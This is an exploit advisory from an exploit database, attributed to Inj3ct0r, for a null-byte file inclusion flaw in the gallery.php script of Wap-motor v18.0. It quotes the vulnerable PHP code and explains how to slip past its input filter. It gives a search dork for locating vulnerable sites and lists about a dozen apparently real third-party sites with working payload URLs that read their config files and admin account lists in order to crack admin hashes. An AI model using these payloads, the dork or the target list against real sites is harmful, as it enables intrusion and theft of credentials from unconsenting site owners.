===============================================================
Wap-motor <= v. 18.0 (gallery.php) File Inclusion Vulnerability
===============================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


Product : Wap-motor
Vesrion : v 18.0
dork: "Powered by Wap-motor"
site: http://visavi.net
download: http://visavi.net/download/down.php?action=ob&did=wap-motor16&fid=MOTOR18.zip&


In this version of vulnerability photo gallery script.
Namely file

http://[PATH]/gallery/gallery.php
Let's code!

PHP code:

<?php 
require_once"../template/start.php"; 
require_once"../template/regglobals.php"; 
require_once"../template/config.php"; 
require_once"../template/functions.php"; 

$image=check($image); 
$ext = strtolower(substr($image, strrpos($image, '.') + 1)); 

if($ext=="jpg" || $ext=="gif" || $ext=="png"){ 
if($ext=="jpg"){$ext="jpeg";} 

$filename = BASEDIR."local/datagallery/$image"; 
$filename = file_get_contents($filename); 
header('Content-Disposition: inline; filename="'.$image.'"'); 
header("Content-type: image/$ext"); 
header("Content-Length: ".strlen($filename)); 
echo $filename; 
} 
?>

file : ./template/regglobals.php


 ... 
if (!ini_get('register_globals')) { 
    while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value; 
    while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value; 
       while(list($key,$value)=each($_SESSION)) $GLOBALS[$key]=$value; 
} 
... 
foreach ($_GET as $check_url) { 
        if ((eregi("<[^>]*script*\"?[^>]*>", $check_url)) || (eregi("<[^>]*object*\"?[^>]*>", $check_url)) || 
            (eregi("<[^>]*iframe*\"?[^>]*>", $check_url)) || (eregi("<[^>]*applet*\"?[^>]*>", $check_url)) || 
            (eregi("<[^>]*meta*\"?[^>]*>", $check_url)) || (eregi("<[^>]*style*\"?[^>]*>", $check_url)) || 
            (eregi("<[^>]*form*\"?[^>]*>", $check_url)) || (eregi("\([^>]*\"?[^)]*\)", $check_url)) || 
            (eregi("\"", $check_url)) || (eregi("\'", $check_url)) || (eregi("\./", $check_url)) ||  
            (eregi("//", $check_url)) || (eregi("<", $check_url)) || (eregi(">", $check_url))) { 

header ("Location: ".BASEDIR."index.php?isset=403&".SID); exit; 
} 
... 


Here, the picture has become clearer to see the algorithm!
Algorithm for action script when processing $ _GET [ 'image']:
1. while (list ($ key, $ value) = each ($ _GET)) $ GLOBALS [$ key] = $ value;
2. foreach ($ _GET as $ check_url) ...
3. $ ext = strtolower (substr ($ image, strrpos ($ image, '.') + 1));
4. header ( 'Content-Disposition: inline; filename ="'.$ image .'"');
header ( "Content-type: image / $ ext");
header ( "Content-Length:". strlen ($ filename));
echo $ filename;

That's what we have:

http://[PATH]/gallery/gallery.php?image=%00../profil/Twost.prof%00.gif


Consider,
image =% 00 - so we Nulle-byte stop processing eregi (). (Thanks for the article Elekt'u fatal mistake Php. Part Two.)
.. / profil / Twost.prof% 00 - inkludim profile file (do not forget to change the admin username to Twost) and trims the same Nulle-byte extension
. gif - but it substitute for the true value goes here
header ( "Content-type: image / $ ext");

The picture we have of course not appear, but it is not empty! Open the text editor and see the base of the account admin, you only have to decipher the hash!
That's it!

Example:

http://mobile-world.dbhost.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://margarita.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://sat-tv.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://kod.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://fuckyou.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://bazooka.pp.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://metra.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://chermo.net.ru/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif
http://sefan.us/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif
http://landark.net.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://vseicq.org.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~  - [ [ : Inj3ct0r : ] ]